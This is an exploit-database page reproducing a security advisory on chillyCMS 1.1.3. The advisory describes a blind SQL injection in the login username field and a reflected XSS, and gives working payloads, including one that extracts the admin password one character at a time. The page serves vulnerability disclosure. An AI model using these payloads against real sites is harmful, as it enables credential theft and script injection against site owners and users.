header-logo
Suggest Exploit
vendor:
chillyCMS
by:
AmnPardaz Security Research Team
8,8
CVSS
HIGH
SQL Injection, Reflective XSS
89, 79
CWE
Product Name: chillyCMS
Affected Version From: 1.1.3
Affected Version To: 1.1.3
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
N/A

chillyCMS Multiple Vulnerabilities

chillyCMS is a Content Management System. Its main features are: easily edit your content in a WYSIWYG editor, manage your users in different groups with different rights, upload single files or whole zip archives, insert your pictures into the content by drag and drop, one click backup with integrated installer, extend your cms with various modules, see which articles are most popular in the statistics. The username, in the login form, is one-parenthesis single-quoted injectable. For details check the PoC section. Whenever login failed, the username will be printed without sanitizing on the main page. This could be used for executing any JavaScript code. Exploiting The (MySQL) SQL Injection Vulnerability: Simply go to the login page at 'victim.com/chillyCMS/core/show.site.php' and use the following vector for injecting arbitrary queries: ') or $THE_QUERY or 1=(' For example you may use following vector for extracting the pw field (for password) of the admin user admin')and substr(pw,I,1)=('C replacing the I with the index of char in a loop and C with different characters of it. If the query result was true, username will be accepted and wrong password error will be shown. If the query result was false, then username will be rejected and the wrong username error will be shown. Allowing blind SQL injection to be performed. Exploiting The XSS Vulnerability: Simply go to the login page at 'victim.com/chillyCMS/core/show.site.php' and use the following vector for injecting arbitrary JavaScript code: '><script>alert(1)</script> This will cause an alert box to be shown whenever login failed.

Mitigation:

N/A
Source

Exploit-DB raw data:

##########################www.BugReport.ir########################################
#
#        AmnPardaz Security Research Team
#
# Title:		chillyCMS Multiple Vulnerabilities
# Vendor:		http://frozenpepper.de/
# Vulnerable Version:	1.1.3 (Latest version till now)
# Exploitation:		Remote with browser
# Fix:			N/A
###################################################################################

####################
- Description:
####################

chillyCMS is a Content Management System. Its main features are:  
easily edit your content in a WYSIWYG editor,
manage your users in different groups with different rights, upload  
single files or whole zip archives,
insert your pictures into the content by drag and drop, one click  
backup with integrated installer,
extend your cms with various modules, see which articles are most  
popular in the statistics.


####################
- Vulnerability:
####################

+--> SQL Injection
	The username, in the login form, is one-parenthesis single-quoted  
injectable. For details check
	the PoC section.

+--> Reflective XSS
	Whenever login failed, the username will be printed without  
sanitizing on the main page. This could
	be used for executing any JavaScript code.

####################
- Exploits/PoCs:
####################

+--> Exploiting The (MySQL) SQL Injection Vulnerability:
	Simply go to the login page at  
'victim.com/chillyCMS/core/show.site.php' and use
	the following vector for injecting arbitrary queries:
	    ') or $THE_QUERY or 1=('
	For example you may use following vector for extracting the pw field  
(for password) of the admin user
	    admin')and substr(pw,I,1)=('C
	replacing the I with the index of char in a loop and C with different  
characters of it. If the query result
	was true, username will be accepted and wrong password error will be  
shown. If the query result was false,
	then username will be rejected and the wrong username error will be  
shown. Allowing blind SQL injection
	to be performed.

+--> Exploiting The Reflective XSS Vulnerability:
	Use the following sample vector in the username field of the login  
page (or any other valid JavaScript
	code) => username:      <script>alert('XSS')</script>

####################
- Solution:
####################

White-list the input parameters before using them in the SQL queries,  
removing any ', \, ( characters
or more simply restrict the parameters' length to a small length.

####################
- Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com

Navigation

Suggest Exploit

Services By CQR